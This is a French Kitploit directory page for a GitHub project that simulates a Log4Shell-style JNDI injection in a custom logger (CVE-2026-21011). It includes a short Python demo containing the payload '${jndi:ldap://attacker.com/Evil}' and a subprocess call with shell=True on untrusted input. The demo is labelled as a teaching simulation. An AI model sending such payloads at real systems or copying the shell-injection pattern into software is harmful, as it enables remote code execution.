Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated- — Simule CVE-2026-21011, une injection JNDI de type Log4j dans un logger personnalisé : analyse les motifs ${jndi:...} et démontre l'exécution de code à distance déclenchée via LDAP. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et Éducation
GitHubgeorge0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-

CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated-

Simule CVE-2026-21011, une injection JNDI de type Log4j dans un logger personnalisé : analyse les motifs ${jndi:...} et démontre l'exécution de code à distance déclenchée via LDAP.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
il y a 17 joursPas encore vérifié

CVE-2026-21011 – Injection JNDI de type Log4j dans un logger personnalisé (simulé)

Code du programme (simulation Java en Python)

root@kitploit:~
# log4j_sim.py - Custom logger that evaluates ${...} patterns
import subprocess, re

def log(message):
    # Vulnerable: looks up JNDI-like syntax and executes
    pattern = r'\$\{jndi:(.+?)\}'
    for match in re.finditer(pattern, message):
        lookup = match.group(1)
        if lookup.startswith('ldap://'):
            # Simulate connecting to LDAP and loading a class
            print(f"Loading malicious class from {lookup}")
            subprocess.run(f"echo 'CLASS LOADED: {lookup}'", shell=True)  # just demo

log("User-Agent: ${jndi:ldap://attacker.com/Evil}")

CVE-2026-21011 – Injection JNDI via un logger personnalisé

Severity: Critical

Aperçu

Un framework de journalisation personnalisé évalue les motifs ${jndi:...} dans les messages de journal, de la même manière que la tristement célèbre vulnérabilité Log4Shell. Un attaquant peut injecter une recherche JNDI pour charger et exécuter du code arbitraire depuis un serveur distant.

Détails de la vulnérabilité

  • Type : Injection de code / Injection JNDI
  • Impact : Exécution de code à distance.
  • Cause racine : Le logger analyse des données contrôlées par l'utilisateur et effectue des recherches dynamiques en fonction du contenu.

Démonstration de l'exploit

Exécutez la simulation :

root@kitploit:~
python log4j_sim.py

Le script affiche qu'il chargerait une classe depuis le serveur LDAP de l'attaquant.

Télécharger l’outil